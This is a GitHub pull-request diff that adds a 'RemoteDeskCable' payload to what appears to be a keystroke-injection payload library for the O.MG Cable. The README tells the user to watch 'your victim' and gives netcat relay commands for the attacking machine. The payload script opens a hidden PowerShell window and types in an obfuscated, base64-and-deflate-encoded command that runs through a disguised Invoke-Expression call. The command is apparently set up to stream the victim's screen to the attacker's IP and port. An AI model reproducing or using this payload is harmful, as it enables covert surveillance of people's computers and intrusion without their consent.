Merge pull request #12 from 0iphor13/master

Created RemoteDeskCable
pull/14/head
Darren Kitchen 2022-01-19 13:37:05 -06:00 committed by GitHub
commit 181d9b3b32
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 74 additions and 0 deletions

View File

@ -0,0 +1,23 @@
**Title: RemoteDeskCable**
Author: 0iphor13
Version: 1.0
What is RemoteDeskCable?
#
*The O.MG Cable is a powerfull tool and can be used as a remote HID, to even increase the power, RemoteDeskCable was released. - Get screen access!*
*See what your victim is doing, see when the time is right to fire up your next payload!*
#
**Instruction:**
!!!Insert the IP of your attacking machine & PORT into the payload!!!
#
Plug in Cable.
Start netcat on your attacking machine like so: nc -lvnp 1234 | nc -lvnp 5678 (Example Ports) This will create a relay towards your second port.
#
Use a browser supporting MJPEG, like FireFox, and visit 127.0.0.1:5678.
Fire up the payload and for the screenshare to appear within FireFox.
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/remote_access/RemoteDeskCable/Screenshot%20from%202022-01-16%2013-28-28.png)
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/remote_access/RemoteDeskCable/Screenshot%20from%202022-01-16%2013-29-03.png)

Binary file not shown.

After

Width:  |  Height:  |  Size: 979 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.3 MiB

View File

@ -0,0 +1,51 @@
DELAY 200
DUCKY_LANG de
DELAY 2000
GUI r
DELAY 250
STRING powershell -NoP -NonI -W hidden
DELAY 300
ENTER
DELAY 300
DELAY 200
STRING $IPADDress='0.0.0.0';$Port=1234;(NEW-oBjeCt SySteM.io.coMPreSsIon.deFlAtEStReam( [syStEm.IO.meMoRYsTrEA
DELAY 300
STRING m] [sysTeM.coNVeRt]::fRoMbaSE64STRinG( 'pVdtb9pIEP7eX7HHoUJ02CHtfcopHwhxE5TyIuxrVKHo1tgT7AZ73d2l1EX+7zezBhJiJ+ldk
DELAY 300
STRING cBOPK/7zDwzfttubN4Vm26xOSka1l0rDFudluXlGeC11zpiVk8pSObLfOQnwNxcaUjsmzgNxVrZH4RM1Bv26DPbSgzG9hASIXNXS/CTW9bcJE4y5t
DELAY 300
STRING PPSk8d3hsW7Iy9feycWXesBQG61fgdwdoaz79gAPUG3xx4pU9z4wre5/eO3plGu+8eTO8slvbR0d70CLTtiuAetNpeWXtW86wXhhKU+uAn8TK/PT0
DELAY 300
STRING dpBokCqyFvO+wOo3ySqeJ4mXg9YITKbQIxHIr6gXZUU2Cio/LBO2+SFMIdLu5GWS9i1By4K5bdJqbjIupVxwq363SQMciZS6k4RRUJlIFqKrGPLgu
DELAY 300
STRING OnRy3nTAR5dP9DaVEOI7hnouF/37fQwQVkOtapYJnOfcc1zX4SOPQCJTYwzBpsDaz+hgvfCYjxZF1c0uJJSa59rhyuUwQvgt+MqsE1avUB8bfahmT
DELAY 300
STRING optRb6ndmCtDGvlBr8y1mCNV1Q6+HPEGhQyu/PjJYRMC9Zgf5h0BKUzxULV4KThRMSprvVXVP57+J/ieQSxjh6B6I55fwuilnRQP4uiQhSv/x+Knx
DELAY 300
STRING FFPGsn3aNoTD2P4kzDd207aSDCOF1ggfdUEMf2JejzXIOiaDw5MCC/hjJ3FHed9NdQ3jMDQXwjY4NqZtAlmBHfdj3AZcs8Abg+gl9A+Ar8EGT1KGcp
DELAY 300
STRING UobaUkZ5vS2biEqghjCWHFtt4V3VPnS51+PeSvXHPHQIyMa7bpeNrxt1wkM+4EMncvwLRxZnDcLzONLJslb4SusJ/+RMXVQSIxS/8rzJ8Yl90qgIv1
DELAY 300
STRING arzc2UO+6Ej1NE3QS5s8WaSvsawxchcMlTBKii3cDq1pBqM9BOWbJa6jjzpT7+biXxdwgtCdnSD+AvNherNPRlfmZZu1syimYrRu2SJt4XZRnRdGll
DELAY 300
STRING AkunbE68wc4kysAuxUoytB3cF5SK4yI/85FyqsXxUJZo+M/dOMbaJIPCGATrk7GL3zlRUFkmTGGCVKHNwWQ7oRovFNrvpq51BCwy6gcP7cPeoIzIL3
DELAY 300
STRING k0RWnSMfTPcQodqK4j7BTiFY9P/3Ze5SDsZUJz69CwLjkcUYJrC39wVCMtPQzpC+mvkTvs81gnfrafzwebiO0GEiBFfpnIOEEIy7/tc0JUoWyoo4f
DELAY 300
STRING 5+19UryBeRDWN3txcUhqzJ0FeSj+L4kChuQ9SJIPEXxBXz2tmWHOzIBLOchIsnbbbTxej1pO1CKrnYpio3e10j446rG1XNqtSrdMKtmZesYAsj4Qe/4
DELAY 300
STRING D6nO2LGCcQDqC6x0MnEbjocRdLAXDTw8GgP0K60FG7Wyc/Rwn/Gx3QEIa44SmOipw0MZOZKqMMt1EiOIvdFe4QOl/jKX/JYFEzOoztl0L9CHzEL5Eg
DELAY 300
STRING zRxLIOHjae6Sf6eXFHYZdZWHcQ7B7Ja495znuNFs1c2Ci+FS9D7m7YmelH5e6xmTlIbPiGQekc7P8JjJ/ZhyfkW8jP+UNZfmpp7PSkaYwtcVKK1qiWnHdb
DELAY 300
STRING uRSVuRoSSR7nlvT3e40/JrDl5Rzhj5EtftqpNM7GyWy82eavi1Y0zNOR66+9IMpcrj+IrAc45+SwT7y0Potztet2yriBrC1/gusBfYVAjx5DHRyzSmlG/M
DELAY 300
STRING Pnjj4+3CbIMiAR1hXbI1sfFainTxG+tHENzT7kJ0q0B+Q7aOFcPXgCDy50iXPh58LlbMl8BWitRJMhBSIvexTEhtN1glIHNulIJ5Y7IcKQUxtJkUN9Ic3D
DELAY 300
STRING 8PJ1O8+Rc='), [iO.cOMprEsSIOn.COMPreSSiONMoDE]::DECOmPRESS ) | fOReaCh{NEW-oBjeCt SysTEM.iO.sTREaMREaDEr( $_, [sYStE
DELAY 300
STRING M.tExt.ENcOdInG]::ASCIi )} |FOReAch{$_.rEADtOEnD()}) | & ((get-vArIaBLe '*mDr*').Name[3,11,2]-Join'')
DELAY 300
ENTER